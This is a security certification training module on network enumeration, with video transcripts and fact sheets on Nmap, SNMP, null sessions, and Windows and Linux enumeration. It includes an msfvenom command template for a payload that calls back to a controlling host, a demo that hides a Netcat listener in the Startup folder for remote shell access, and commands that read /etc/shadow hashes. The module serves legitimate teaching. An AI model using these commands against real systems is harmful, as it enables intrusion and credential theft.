Section 5.3 Enumeration

As you study this section, answer the following questions:

  • What type of information can be found using enumeration?
  • What is Simple Network Management Protocol (SNMP) used for?
  • How does a brute force attack work?

In this section, you will learn to:

  • Perform enumeration with Nmap
  • Perform enumeration with Metasploit
  • Perform enumeration of MSSQL with Metasploit

The key terms for this section include:

TermDefinition
Enumeration A computing activity in which usernames and information on groups, computer names, system information, shares, and services of networked computers are retrieved.
Simple Network Management Protocol (SNMP) A protocol used to collect information on network devices. This information is used to help manage these devices.
Simple Mail Transport Protocol (SMTP)A protocol used to send and receive email.

This section helps you prepare for the following certification exam objectives:

ExamObjective
CompTIA CySA+ CSO-003 2.1 Given a scenario, implement vulnerability scanning methods and concepts
  • Asset discovery
    • Map scans
    • Device fingerprinting
  • Special considerations
    • Performance
    • Regulatory requirements
  • Passive vs. active
  • Static vs. dynamic
    • Reverse engineering
    • Fuzzing

2.2 Given a scenario, analyze output from vulnerability assessment tools

  • Tools
    • Multipurpose
      • Nmap
      • Metasploit framework (MSF)

2.4 Given a scenario, recommend controls to mitigate attacks and software vulnerabilities

  • Security misconfiguration

2.5 Explain concepts related to vulnerability response, handling, and management

  • Attack surface management
    • Penetration testing and adversary emulation
TestOut CyberDefense Pro 2.1 Perform threat analysis
  • Determine the types of vulnerabilities associated with different attacks

3.3 Perform penetration tests

  • Perform internal penetration testing

5.3.1 Enumeration

Click one of the buttons to take you to that part of the video.

Enumeration 00:00-01:23 One definition of the word enumeration is mentioning a number of things one by one. In this phase of discovery, we move into a more active phase. Passive activities, such as those performed during reconnaissance, give the attacker information about an organization. These activities include learning about public-facing facts from the internet, websites, and financial reports. Some attackers go as far as to engage in dumpster diving and shoulder surfing. The enumeration stage involves more penetrating tasks, which increases the chances of getting caught.

This is where you verify your contract with the organization. Some of what you do could be considered illegal, so make sure you have the organization's permission before beginning your enumeration. Misunderstandings can happen, so it might be a good idea to review your plans with the management team.

Using enumeration techniques, attackers try to discover network information such as usernames, group names, computer names, system information, equipment and appliance types, and network mapping. They look for anything they can find and exploit.

In this stage, we're looking into a network and using tools that could alert the organization that we're there and snooping around. We have to be careful that we fully understand the tools we're using. They'll differ based on the objects we want to enumerate and the operating system we use to gather and enumerate with. I'll explore the differences as we move forward.

Default Credentials 01:23-02:01 Most, if not all, network devices require authentication. These devices include switches, routers, firewalls, wireless devices, and various appliances. Often, network administrators change default credentials on these devices. But sometimes, they forget. When default credentials aren't changed, a vulnerability is created right off the bat. This is an easy exploit for an attacker since there are several websites that publish default credentials. Should an attacker gain control of these devices, they can review configurations to gain insightful information about network topology and possibly make changes that could cause additional harm.

SNMP and SMTP Protocols 02:01-03:27 While devices' default credentials could add vulnerability to a system, so can default protocols. The SNMP and SMTP protocols can prove to be weak points on a network system.

Simple Network Management Protocol, or SNMP, is used to provide management to and from network devices. There are private, public, and community strings and passwords that can be used to provide management to routers, switches, and servers. The public community provides read-only access to the devices and the private community provides read and write access. SNMP uses agents that communicate with network devices. The device manufacturer supplies MIBs, or management information bases, that work with the SNMP manager to interpret messages it receives from connected and managed devices. The SNMP manager can be used to maintain device configurations. If you leave SNMP passwords at their defaults, an attacker could easily utilize this information to gain control of your network system by intercepting configurations, routing tables, file shares, and more.

Simple Mail Transport Protocol, or SMTP, is used to send emails from one server to another over the internet. Using SMTP, hackers can gain useful information such as usernames, email addresses, and email lists. Also, attackers can use this information to find additional information such as customers, vendors, or company secrets.

Brute Force Attacks 03:27-04:25 It's important to understand the mind of an attacker. They'll use whatever techniques they have available to them at the time. Their first attempt at gaining access to an enumerated system is almost always with default credentials. Most of the time, this technique doesn't work since most system administrators have been trained to change the defaults before putting a device into production. A technique they'll often try next is called a brute-force attack.

A brute-force attack uses a list of known or pre-compiled ciphers, passphrases, or passwords. Using software easily obtainable from the internet or in preconfigured virtual machines such as Kali Linux, the attack can automate their attack. One example of a brute-force attack shows the attacker typing in different passwords to try and guess the correct one. To help, he or she can download a pre-compiled list containing thousands of common passwords and combinations of numbers, letters, and symbols, called a dictionary.

DNS Zones and Zone Transfers 04:25-05:15 Domain Name System, or DNS, is used each time anyone goes online. When a user wants to visit a website, he or she typically enters something like www.sitename.com. These words that are recognizable to us have little meaning to a computer. Computers understand addresses—in this case an IP address. This is where DNS comes in.

DNS translates the human-readable name into an IP address. If an attacker gains access to an organization's DNS information, it can manipulate the data and redirect unsuspecting users to malicious websites. One example might entail a user going to a website that appears real, entering their credentials, and having an error message pop up. The attacker who maintains this malicious site now has credentials to the real website they can use for nefarious purposes.

Summary 05:15-05:56 As you can now see, enumeration is a powerful tool for attackers. They can utilize software tools and techniques to learn more about an organization and use that information to find weaknesses and vulnerabilities. They can enumerate object information, such as usernames and network equipment, and exploit default credentials to gain control of network devices. They might also take advantage of default weaknesses in system protocols, such as SNMP and SMTP, and attempt to guess passwords using brute-force tools. Lastly, they might study DNS to find out how it's being used in an organization's network.

5.3.2 Enumerate Operating Systems

Click one of the buttons to take you to that part of the video.

Enumerate Operating Systems 00:00-00:54 Attackers or threat agents are always looking for weaknesses in an organization's defenses. They look for even the tiniest opening they can exploit. After an attacker does his or her due diligence with passive reconnaissance, they move on to the active phase and begin to enumerate the network. This is done by using tools that are widely available and, with a little knowledge, can locate weaknesses and find entry points. Once inside, he or she can do almost anything they want, so understanding how an attacker gets inside in the first place helps network management set up good defenses.

Tools and techniques vary depending on the device. If an attacker targets an infrastructure device, such as a firewall, router, or switch, he or she might choose a whole set of tools to use. If it's a server they want, they might try to enumerate Windows Active Directory or gain access to a workstation running Windows, Mac, or Linux.

Nmap 00:54-02:48 One of the first tools many threat actors go to is Nmap, which stands for Network Mapper. Nmap is used to map out a network and scan for open ports, and it provides quite a bit of useful information while doing so. It's power is in the command line options. Depending on how it's used and the command line parameters in place, Nmap can provide an attacker with everything they need to exploit a system. Here are some of the command options to know:

'-sT' / '-sU' report open ports for TCP-only or UDP-only services.

'-A' enables OS scanning. Nmap analyzes the device's response and attempts to fingerprint the operating system.

'--top-ports ' scans the number of the most popular ports. You can replace num with the number of ports to use.

'-T<0-5>' sets the timing template. The higher the value, the faster the scan. The issue here is detection. The faster the scan, the more likely it is to be discovered by an intrusion detection device. Depending on the circumstance, an attacker might choose to decrease the scan speed to avoid detection even if the scan takes a longer amount of time.

'-S ' spoofs the source IP address. The attacker might want to disguise where the scan is coming from and substitute a trusted device, such as a firewall or infrastructure server.

'-p' scans only the ports specified. You can specify a single port, multiple ports separated by commas, or a range of ports using a dash. You can also specify whether to scan UDP or TCP ports by using a 'U' or a 'T' followed by a colon and the list of ports.

As an example, you might want to execute Nmap to find only open TCP ports, perform an OS scan, or slow the system down to avoid detection.

Enumeration Tools 02:48-04:26 While Nmap is one of the most widely used tools to enumerate networks, there are others as well. Know that these may or may not be available as part of your OS distribution, as not all tools are available for Windows, Mac, and Linux. As a general rule, most tools are available within the Linux

environment, and this is the case with the ones we'll discuss here. It's also important to understand that some of them aren't considered hacking tools, but someone could use them to gain additional information in preparation for a later attack. Here are some of the enumeration tools to be familiar with:

nbtscan scans a network for Windows or Samba servers on a subnet. It displays IP address, server name, and MAC address.

snmpcheck displays all the information available for a given community on a specified IP address.

Metasploit is a general-purpose framework that uses predefined scripts for launching several different types of discovery.

Ikeforce is a Python script that can be used on a network to provide information about potential VPN servers.

Dnscat is a Ruby program that tunnels data over DNS to avoid firewalls.

John the Ripper is a password-cracking tool. Using other tools, usernames can be enumerated and then JTR can be used to crack the password.

There are a couple of things here that are important to point out. First, not every tool is appropriate for every action. Also, an attacker has probably taken the time to learn about the different choices he or she has and which one is best to use in a given circumstance. And there are many resources freely available on the internet that can help anyone learn how to use these tools to produce the information they want, so don't think that only an expert is able to breach your system defenses.

Active Directory Enumeration 04:26-05:03 One often-targeted platform is Windows Active Directory, or Windows AD. This is the database that maintains all Windows objects and attributes. All users, computers, groups, permissions, policies, and so on are maintained on AD. Often, knowing usernames and group names helps the attacker to refine their attack plan. Finding users and groups is relatively easy, since AD is a Lightweight Directory Access Protocol-compliant, or LDAP-compliant, database. There are several LDAP client programs that use commands to interrogate a database, and they can be downloaded and used on each platform. One such tool is called ad-ldap-enum.

ad-ldap-enum 05:03-05:53 The ad-ldap-enum tool is a Python script used to enumerate a Windows Active Directory domain. It's a command line tool that displays a list of users and groups in a particular domain. Several key elements are required to run this tool, but someone could find these items using additional information-gathering. Some of what's required is the:

LDAP server IP address

AD domain name

AD authentication username and password. If unauthenticated users are allowed, one could utilize the NULL value as the authenticated user.

While these aren't all the criteria, they're the critical elements one needs to run the tool. Once enumerated, the hacker can get to important user data, such as users' names, their organizational role, their AD username, phone number, who they report to, and so on. Attackers often use information like this to send phishing emails and to social engineer.

Summary 05:53-06:46 That's it for this lesson. In this lesson, we covered some of the tools an attacker can use to enumerate a network. It's important to realize that there are many tools out there on many different operating systems that can accomplish this. Nmap is the predominant tool available on all platforms and lets attackers probe a network and gather information about hardware, such as open ports and the operating system version. There are other enumeration tools that uncover things like operating system shares, weak points, firewalls, and unsecure passwords. Using LDAP tools can query Windows Active Directory to gather user and group information that can be used in different attack scenarios. All of these methods provide information a threat actor could use to exploit a network system, so it's important that you know and understand them all in order to be on the lookout for suspicious behavior.

5.3.3 Enumeration Facts

Enumeration is the process of discovering network information that can be used to exploit the system. Enumeration begins the active phase of discovery. By utilizing the information found in reconnaissance, an attacker can attempt to gather more information by penetrating the network infrastructure and interrogating key assets.

This lesson covers the following topics:

  • Discovery of enumeration objects
  • Default credentials
  • Simple Network Management Protocol (SNMP) and Simple Mail Transport Protocol (SMTP) protocols
  • Brute force attacks
  • DNS zone transfers
  • Windows enumeration
  • Linux enumeration

Discovery of Enumeration Objects

Using a variety of tools, an attacker tries to discover network information to exploit. These tools can create noise that alerts security staff that something is happening. Attackers use stealth methods to try to avoid detection while conducting activities.

Attackers are looking for information such as:

  • Usernames
  • Group names
  • Computer names
  • System information
  • Equipment/appliance types
  • Network mapping

Default Credentials

When implementing new connectivity equipment or protection devices, system administrators may forget to change the default device credentials. This leaves an opening for attackers to exploit. These devices include:

  • Switches
  • Routers
  • Firewalls
  • Wireless devices
  • Appliances

SNMP and SMTP Protocols

SNMP and SMTP are often required for an organization to function. You can use SNMP to maintain device configurations and report network outages. SMTP is required to send and receive emails. The following table describes the use and potential weakness of the SNMP and SMTP Protocols.

Protocol Use and Potential Weakness
SNMP Uses agents that communicate with network devices via three paths: private, public, and trap.
  • The public community provides read-only access to the device configuration.
  • The private community provides read/write access to the device configuration. Be sure to configure a high level of protection for the private community to ensure the integrity of the system.
  • Traps are unsolicited messages from a device to an SNMP manager. They indicate power up, link up/down, high traffic, excessive temperature, etc.
    Disable or remove SNMP if you do not use it.
SMTP Provides server-to-server communication for email. You need two pieces of information when configuring an email client:
  • The IMAP/POP server information (incoming email)
  • SMTP server information (outgoing)

SMTP is required for email. On some systems, SMTP is enabled by default. Attackers can exploit an open SMTP server to send phishing emails or conduct other illegal activity. It is important to use strong credentials on email servers to help ensure system integrity.

Brute Force Attacks

Unprotected systems are vulnerable to a brute force attack. Attackers have tools that use precompiled ciphers, passphrases, and passwords to guess a user's password. This makes it critical to have a strong password requirement.

Requiring complex passwords is the best defense against brute force attacks. Passwords that require the use of a capital letter, number, and symbol, with a length of more than eight characters, are considered strong.

A good method to use is substitution. For instance

  • Use @ to replace an A
  • Use $ to replace an S
  • Use ! to replace an i or l
  • use 5 to replace an S
  • use 3 to replace an E

DNS Zone Transfers

Domain Name Services (DNS) translates a domain name into an IP address. One example is www.testout.com translates to 104.16.127.52. Often, an organization maintains an internal DNS server for local assets. An organization may also maintain a primary and secondary server for redundancy.

When a change is made to the primary server, the change must be copied to the secondary server. This is called a DNS zone transfer. An attacker can intercept a zone transfer, make changes to it, and redirect users to a malicious website designed to steal user credentials and weaken security.

Windows Enumeration

In Windows, a user account is an object that contains information about a user, the user access level, the groups the user is a member of, and user access privileges. The default Windows installation includes two primary user accounts, the administrator and the guest.

A few built-in accounts are also designed to run background processes as needed. These include local service, network service, and system. The following table describes the default Windows accounts, as well as the other types of accounts you may encounter:

User Description
GuestHas remained virtually the same in all Windows versions it appears. It is intended to be used only in very limited circumstances.

Although included in the Windows installation, it is not enabled by default.
AdministratorHas gone through changes as the operating system has evolved.
  • In earlier versions of Windows, the administrator account was enabled by default.
    • The administrator account was often used as a normal user account.
    • As a result, everyday users had unlimited access to permissions that the user did not necessarily know what to do with.
    • If malware or other applications were running in the background, those programs also had access to those unlimited permissions.
    • Users with unlimited access to permissions are a security risk.
  • Beginning with Windows Vista, the administrator account has been disabled by default.
    • This change was made primarily for security purposes.
    • Current versions of Windows require user accounts to be created.
    • Although you can enable administrator privileges for the account, additional permission needs to be granted when elevated administrator privileges are needed.
    • This change prevents a user from unintentionally allowing an unwanted application or process to run in the background.

Local service Provides high-level access to the local machine but only limited access to the network. Network service Provides normal access to the network but only limited access to the local machine. System Provides almost unlimited access to the local machine.

Windows groups provide an efficient way of managing user control access.

  • You can assign users to groups and assign permissions based on group membership.
  • You can create your own groups based on departments, locations, or other methods.
  • Microsoft also includes a few preconfigured user groups. These groups can be used as-is or modified to suit your needs.

The following table gives a simple summary of the groups you find on Windows.

Group Description
Anonymous logonProvides anonymous access to resources, typically on a web server or web application.
BatchIs used to run scheduled batch tasks.
Creator groupIs a Windows 2000-specific group that grants permissions to users who are members of the same group as the creator of a directory or file.
Creator ownerIncludes the file or directory creator as a member of this group. By default, all releases after Windows 2000 use this group to grant permissions to the creator of the file or directory.
EveryoneIncludes all users as members. It is used to provide wide-range access to resources.
NetworkIncludes all users who access a system through a network. It provides all remote users access to a specific resource.

Although you may think of the username as the unique identifier, Windows uses a security identifier (SID) for that purpose. When a user object is created, Windows assigns it an SID. Unlike a username, that ID cannot be used again.

  • An SID is necessary because a username can undergo name changes.
  • If permissions were tied to a specific name, a new account would have to be created for each change.
  • The SID allows Windows to adjust the username and maintain the same SID.
  • SID identifiers provide information about the account.
    • An account ending in 500 is the built-in administrator account.
    • An account ending in 501 is the built-in guest account.
The Windows Security Accounts Manager (SAM) is a part of the system registry and stores all usernames and passwords. The passwords are not saved in plaintext but are encrypted in LM and NTLM hash formats. For larger networks, Microsoft's Active Directory manages this data.

Linux Enumeration

Linux requires a user account to access a Linux system. When you create a user account, the values are stored in the etc/passwd file. This file is accessible to all regular users. Users do not need elevated privileges to access it.

The following table describes some of the files that are used in Linux user authentication:

Value Description
UsernameIs used with a user ID (UID) to identify users.
  • When you create a username, it is given a UID number.
  • This number is selected from a range of numbers, typically above 500.
PasswordIs given to each account.
  • The password is encrypted and saved on the computer or the network.
  • A hash of the local password is usually stored in the /etc/shadow file.
GroupsAre used to manage permissions and rights.
  • Group identification numbers (GIDs) are stored in the /etc/passwd file.
  • All users are assigned to the default primary group and can be assigned to additional groups that are called secondary groups.
  • Secondary groups are listed in the /etc/group file.

Enumeration Tools

The following table lists several enumeration tools.

Tool Description
fingerProvides information about a user. You can enter:
  • finger –s username to obtain the specified user's login name, real name, terminal name, write status, idle time, login time, office location, and office phone number.
  • finger –s to obtain the same information as finger -s username about all users on a system.
  • finger –l user@host to obtain information about all users on a remote system.
NULL sessionIs created when no credentials are used to connect to a Windows system.
  • A null session is designed to allow clients access to limited types of information across a network.
  • A null session can be exploited to find information about users, groups, machines, shares, and host SIDs.
  • A hacker can enter:
    • net use //hostname/ipc$ \\ hostname \ipc$ /user: username to connect to a system.
    • net view \\ hostname to display shares available on a system.
    • s: \\ hostname \ shared folder name to connect to and view one of these shares.
PsToolsIs a suite of very powerful tools that allow you to manage local and remote Windows systems.

The package includes tools that can change account passwords, suspend processes, measure network performance, dump event log records, kill processes, or view and control services.
SuperScanIs used to enumerate information from a Windows host. Information gathered can include NetBIOS name table, services, NULL session, trusted domains, MAC addresses, logon sessions, workstation type, account policies, users, and groups.
Metasploit Framework Is a tool for developing and executing exploit code against a remote target machine. It is part of the Metasploit Project. It can:
  • Check whether a targeted system can be exploited.
  • Allow selection of specific exploit code to be used.
  • Compile exploited code into the target system's native executable type as a payload and exploit the system.
Exploit payloads are generated with the command:
msfvenom -p payload_type LHOST= ip_or_hostname_of_controlling_host LPORT= port_on_controlling_host -f executable_format -o output_filename
The output file is then uploaded to the target system and executed. The command msfconsole is used to start the console, where commands can be issued to a target host.

5.3.4 Vulnerability Analysis Facts

This lesson covers the following topics:

  • Map/discovery scanning
  • Device fingerprinting
  • Static analysis
  • Dynamic analysis
  • Fuzzing
  • Reverse engineering
  • Compliance scans and regulatory requirements

Map/Discovery Scanning

A map, or discovery, scan identifies the devices connected to a network or network segment. Although simple in concept, map scans are complicated by highly segmented networks, router ACLs designed to limit communication, devices connected via VPN, and host-based firewalls, which typically block common mapping methods (such as ping.)

Discovery scans allow security teams to identify connected devices and uncover potential problems. For example, support teams may attach a printer to a network segment in response to user requests for more convenient printing options. Regulatory or policy requirements may not allow this type of device to be configured in this way, or the discovery of the new device may trigger deeper evaluation to determine whether it is properly configured and using only secure protocols. Security analysts can also locate rogue devices like employee equipment or IoT, and devices with improperly configured firewalls. For networks without network access control restrictions or for networks with simple port-based access control (or no restrictions), network scans can be a helpful mechanism for locating unauthorized devices.

Device Fingerprinting

Fingerprinting describes the effort taken to more specifically identify details about a device. Whereas a map or discovery scan looks for connected devices, a fingerprint scan looks to focus attention on an individual device to better understand its purpose, vendor, software versions, configuration details, and the existence of vulnerabilities.

Static Analysis

Static analysis can be performed in a variety of ways. One method involves manual inspection of source code in order to identify vulnerabilities in programming techniques. Another approach uses specialty applications or add-ons to development tools that are designed to look for well-known programming methods and constructs that are known to be problematic.

An example of how manual inspection of source code might expose vulnerabilities is shown below. In this example, it can be observed that the logic contains a potential issue as privileged access is dependent on a successful pre-check. The problem with this approach is that if the check fails, then privileged access is granted. The opposite should be true, meaning that limited access should be the default if a check fails.

Problematic approach:

if admin == false

(limited access)

else (privileged access)

Below is a better example. If the evaluation logic fails, limited access is granted (this is what's called a fail-safe):

if admin == true

(privileged access)

else (limited access)

Additionally, reviewing network and data flow diagrams and configuration files can expose vulnerabilities. Assuming that diagrams are complete and up to date, reviewing these plans can expose vulnerabilities that might not be apparent using other techniques. Some examples might include identifying wireless access points in troublesome locations, data interfaces, or external access points to systems and applications. In the case of configuration files, many times usernames, passwords, and encryption keys can be discovered there.

Dynamic Analysis

Dynamic analysis includes using vulnerability scanning software to identify vulnerabilities and, in a more vigorous approach, penetration testing. A dynamic analysis approach requires evaluation of a system or software while it is running. Evaluation tasks may be manual interactions with the features and functions that comprise the system, application, or interactions that leverage the power of specialized tools; for example, using Burp Suite to carefully observe, control, and/or manipulate the data moving between the browser and application.

Fuzzing

Fuzzing is an unknown environment testing (formerly known as black box testing) method using specialty software tools designed to identify problems and issues with an application by purposely inputting or injecting malformed data to it. A fuzzer is the tool used to automatically generate and inject the malformed data. The fuzzer will generally use different number formats, character types, text values, and/or binary values as it operates and include sequences and values known to be problematic, such as: very large, zero, or negative numbers; URLs instead of typical values; and escaped or interpretable sequences such as SQL commands. Additional information regarding fuzz testing is available at https://owasp.org/www-community/Fuzzing

Reverse Engineering

Reverse engineering describes deconstructing software and/or hardware to determine how it is crafted. Reverse engineering's objective is to determine how much information can be extracted from delivered software. For example, reverse engineering can sometimes extract source code, identify software methods and languages used, developer comments, variable names and types, system and web calls, and many other things. An adversary can perform reverse engineering on a software patch to identify the vulnerabilities it is crafted to fix, or an analyst can perform reverse engineering on malware to determine how it operates. Other examples include the theft of intellectual property by extracting elements of a delivered product that are otherwise protected. Reverse engineering is not limited to software. Hardware can be reverse engineered to better understand how it operates in order to insert malicious components, for the theft of intellectual property, and/or to carefully inspect how a device operates in order to confirm it meets security requirements or to determine if it has been tampered with. Reversing can be performed on all nature of devices, and some examples might include security tokens, computer equipment, network and wireless equipment, cars, wearables, IoT devices, and many others.

Compliance Scans and Regulatory Requirements

Legal and regulatory environments will usually be accompanied by a security framework or checklist of the controls and configuration settings that must be in place. Security software products such as IDS, SIEM, and vulnerability scanners can often be programmed with compliance templates and scanned for deviations from the template.

Some sources of external compliance may dictate a scanning frequency that your organization must follow; others take a more hands-off approach and simply require that you have a plan in place to scan at certain intervals.

Screen shot of Nessus scan template

Details

The tab at the top reads, policy library, followed by settings. The settings menu on the left has the following options: basic, discovery, and advanced. The basic option further has two options, general and permissions. General is selected.

Three lines of text are written on the right. Below is the box to enter the name and description. Save and cancel button are at the bottom of the page.

PCI DSS compliance scan in Tenable Nessus. (Screenshot courtesy of Tenable Nessus tenable.com .)

5.3.5 Enumerate Windows

Click one of the buttons to take you to that part of the video.

Enumerating Windows 00:00-00:22 After you've gained access to a system, the first thing you want to do is obtain as much information about the system and network as you can. In this demo, we're going to gain access to a Windows system using Netcat and then use several Windows commands to enumerate information from the Windows system.

Gain Access with Netcat 00:22-01:25 All right. Here's the scenario: I'm on a Windows 10 machine that I've obtained physical access to. Perhaps I'm a security analyst, and I've downloaded the program Netcat. I've extracted the files and created a folder on this machine in an obscure location. I've already done an ipconfig to find out the system's IP address. And let's also say I've created a batch file and put it into the Start folder so that every time Windows starts, it runs that batch file. Not only that, but it hides the fact it was running. In that batch file, it's going to go to the folder where I have Netcat hidden and run the command to start Netcat on port 2222. At that point, Netcat will run and listen, or wait for a connection request and form another system. So, the process might be a bit odd, but a system admin for a school system I know very had this sort of thing happen to him. The victim machine was a teacher's workstation, and a student was helping that teacher with a project.

Gain Access from Kali Linux 01:25-02:00 Okay. I'm on a Kali Linux machine now. I'll open a terminal. I want to gain access to that listening Windows system. I'll do that by typing ‘nc -nv 192.168.86.29 2222' and pressing Enter. When I do, I get a C prompt, and I'm on the Netcat directory on that Windows system. I can pretty much do whatever I want to from here. And I want to enumerate information about this system.

Enumerate the Windows System 02:00-04:22 Lets go ahead and start finding out more about this system. I'll first go to the root directory by typing ‘cd ' and pressing Enter. I'm going to start by finding out what version of Windows I have. That command is just the word ‘system', and you can see the version of Windows that I have.

Next, I'll type in ‘systeminfo'. This gives me a ton of possibly useful information. Of course, it all depends on exactly what I'm looking for. But, as I scroll up and down, you can get an idea of the number of things we can get. For example, it's a Dell system. You can see the processor here. And it looks like I have 16 gigs of RAM.

If I want to see the username, I can find that out by typing ‘set username' and pressing Enter. Perhaps I want the computer name. I'll get it by typing in ‘set computername'. Press Enter, and I have that information. Typically, companies have naming conventions. So, once you figure them out, you can pretty much guess what all the other systems are called.

I can find the local groups on this system by typing ‘net localgroup'. Here, you see the local groups on the system. You might also want to know who the administrator groups are. You find that out by typing in ‘net localgroup administrators'.

I can display the ARP table. I can do that by using the ARP command, ‘arp -a'. This might come in handy later if I wanted to spoof the MAC address of one of the systems on the network. You can see all the MAC addresses here.

If I'm interested in what directories are being shared on this system, I can type in ‘net share' and press Enter, and we get a list of shares.

Finally, let's look at all the tasks running on this system. This is the same as if I were to go to Task Manager. To do this, I'll type in ‘tasklist'. Press Enter, and a long list of items is displayed.

These are just a few commands you can use. You can enumerate endless things from a command prompt. We could also go into folder directories and list the contents and copied files. Perhaps you want to see what someone has been working on recently; you could go to that folder and list that information. And remember, you can do all of this by keeping a persistent connection with Netcat.

Summary 04:22-04:44 That's it for this demo. In this demo, we configured a Windows system to listen for a connection request from a remote machine. We remoted into that machine and enumerated information from that system. These are just a few of the things you can enumerate—have fun exploring other options on your own.

5.3.6 Enumerate a Linux System

Click one of the buttons to take you to that part of the video.

Enumerate a Linux System 00:00-00:20 Part of the information gathering phase involves enumerating systems. Linux servers are a favorite enumeration target. Servers are used for a variety of activities, and inexperienced system admins might unknowingly leave something open or unpatched. In this demo, we're going to enumerate a Linux system.

Use SSH to Gain Access 00:20-00:47 Okay. I'm working in the terminal on this Kali Linux system. Let's assume, for whatever reason, I have the root password for a Linux-based router on this network, and SSH is enabled. I'm going to type in 'ssh 10.10.10.1' to open an SSH session to the remote system. Great. It looks like I'm able to connect, so I'll put in the password here. I'll press Enter, and I'm connected. Remember that, in Linux, when you enter passwords, it appears that nothing is happening.

Document Information 00:47-01:23 Right away, I'm getting some good information. I can see that the name of the system is Router, and the domain name is CorpNet.xyz. It looks like the distribution is Untangle, which is a Linux-based router and firewall that comes in both free and paid versions. Down here, I can see when the last logon was and that it was from this IP address. So, if the system admin were to view the same thing, he would be tipped off that someone has accessed this system. We'll look at logon history again in a little bit.

Throughout this demo, I'll be clearing the screen so that we can focus on the current command being entered, so let's do that now: type 'clear' and press Enter.

Enumerate the Kernel, Operating System, and Device Information 01:23-02:42 Let's go through a few items that we want to enumerate: the kernel, the OS, and some device information. I'll start with the 'uname -a' command. Basically, this gives us the same information that we just looked at. This is a Debian 4.9.110 system. If there are known vulnerabilities with that version of Linux, it might help us research some exploits later.

The next command is 'uname -r'. This will tell us the kernel release for this version of Linux. Now let's try 'uname -n'. This basically gives us the hostname of the system, which we already saw earlier. I could also just type in 'hostname' and get the same information.

Now, let's get some kernal information. For that, we'll type in 'cat /proc/version' and press Enter. This gives me some of the same information, but also a bit more detail, such as the release date, over here.

I can find some device information. Let's look at the CPU. I'll type in 'cat /proc/cpuinfo' and press Enter. And up here, I have one CPU. It's an Intel i7. And we have a variety of other information.

Now, let's look at the file system to see if there's anything interesting. This command is just 'df -a'. When I press Enter, I get my file system information. On the right, you can see the path to the different files.

This is all fun and interesting, but let's see what we have for users and groups.

Enumerate Users and Groups on Linux 02:42-04:16 Now, I want to enumerate the users and groups on this system. Let's start with a list of the users. For that, let's type in 'cat /etc/passwd'. And here, you can see a list of users. Most of these look like the defaults on this system, so there's nothing too exciting here.

If I want to see groups, I'll type 'cat /etc/group', and there's a list of groups. Most of these are default groups.

The password hashes could be a bit more exciting. On Linux, the passwords are kept in the /etc/shadow file. Every practice exam you take for any penetration test or ethical hacking certification will probably ask you where the passwords are located on a Linux system. So, to take a peek at this, I'll type in 'cat /etc/shadow'. When I do, I can see the hashed password for the root user up at the top. Of course, we already know that password (it's how we got into the system). But there could be other hashed passwords for other accounts that we might be interested in copying and trying to crack later.

Okay, let's move on. Next, we want to see who logged on to this system last. This is an easy command to remember: it's just 'last', and here's our list. It looks like the root user is the only one. It tells me the IP address, the date, and here, I can see that I'm still logged in.

Another good one is 'lastlog', which tells us the last time a user logged in. That might be useful for figuring out who broke something. Up here, I can see the most recent login, which is the same information we just looked at. If I had other accounts on here, I'd be able to see when they last logged in, too.

Enumerate Network, Routing, and Communications on a Linux System 04:16-05:50 Okay. Now, let's look at enumerating the network and routing on this system. Knowing the number of network interfaces, ARP information, services, routes, and iptables can tell us a lot. Let's look at a few of these briefly, starting with the network interfaces.

We already know the internal IP address for this system because we remoted in with SSH. But, since it's a router, it must have other interfaces, and I want to know what those are. To get that information, I can type 'cat /etc/network/interfaces' and press Enter. Here, I can see that it looks like IP version 6 is disabled. Here's my internal adapter with the IP address. Up a little farther, I can see a second IP version 6 adapter. Up here, there's one that appears to be set to get an IP address from DHCP.

If I want to view what services are running, I can type in 'cat /etc/services'. And if I go way up here, I'd bet I'll find SSH running, and here it is. This is a huge list, more than what we can cover in this demo.

The last thing we'll look at are the iptables. As a review, iptables is an application that allows you to configure specific rules. It acts as a packet filter and firewall that examines and directs traffic by port, protocol, or other criteria. To view iptables, I'll type 'iptables -L'. -L gives us a list of the current rules for the iptables. Using iptables isn't part of this course, but the term does come up a few times, so it's good to be aware of them. As I scroll up, you can see a lot of rules that are configured for this system.

Other Commands 05:50-06:34 All right. That was a lot of stuff. And we didn't even come close to scratching the surface of the damage that can happen. Some of the other things we could do are make a new user, change users' passwords, and delete users. Imagine the chaos if this was a critical system and a malicious attacker gained access, locked everyone out, and had complete control, and you weren't able to get into the system yourself. That does happen sometimes, so enumerating a system is very important.

One final note: when enumerating systems, most penetration testers and ethical hackers don't enter these commands one at a time. They have scripts that they use to do this job thoroughly, quickly, and efficiently. There are many websites where you can find scripts already prepared, and you can modify them for your own purposes.

Summary 06:34-06:57 That's it for this demo. In this demo, we used SSH to remote into a Linux system. We demonstrated how to enumerate the system, users and groups, and networking. This wasn't a complete list of things you can enumerate, just a few things. We ended by discussing that scripts are typically used to make this process easier.

5.3.7 Enumerate with NetBIOS Enumerator

Click one of the buttons to take you to that part of the video.

NetBIOS Enumeration with Enumerator 00:00-00:40 To get a better idea of the devices on a network, you might want to do some NetBIOS enumeration. NetBIOS is an acronym for Network Basic Input/Output System. NetBIOS allows applications and computers on a local area network to communicate with network hardware and transmit data across the network. So, what are we using it to look for, exactly? Well, we might be looking for computers that belong to a domain, a list of shares on individual hosts, or perhaps computer and password policies. As a command line tool, we could use the Nbtstat utility, but we're going to use a GUI program called NetBIOS Enumerator for this demo.

Scan the System 00:40-01:04 NetBIOS Enumerator is a free open-source tool. I've already downloaded it to this Windows 10 system. I'll come down here and open Explorer. It doesn't have an installer; it just runs the executable. I'll go ahead and put in the IP range of '10.10.10.1' to '10.10.10.254', come up here, and click on Scan. This is going to take a few minutes, so I'll pause the recording while it scans.

Scan Results 01:04-02:02 Okay, my scan is complete. It found five devices. If I expand some of these, I can see there's a NetBIOS section here. If I expand it, I can get some information about the NetBIOS information on this device. Here's my MAC address.

Now let's right-click on this. I have a menu item, here, that says Gather Information. When I click on it, I get some additional information to the right, in this pane.

This says it's created a NULL session. Hackers often use NULL sessions to explore networks. A NULL session connection allows you to connect to a remote machine without using a username or password. Instead, you're given anonymous or guest access. The good news is that newer operating systems aren't vulnerable to NULL sessions, but the bad news is that older operating systems are.

Back here, on the left, we can see that we have another Windows system on our network. Here, again, we have our NetBios names along with some additional information.

Optional Settings 02:02-02:33 Up here, there's some settings that we can configure. In general, this program is pretty straightforward and simple to use. Under the General tab, we have some timing settings. We can set the number of retries for our scan.

Under the Connection tab, we have two options. We can do a NULL session, which, once again, tries to establish a connection without a username or password, or we can put in credentials for the scan.

The final tab is Port Scan, where we can check or uncheck the ports we want to scan, or we can add our own ports to scan along with a description.

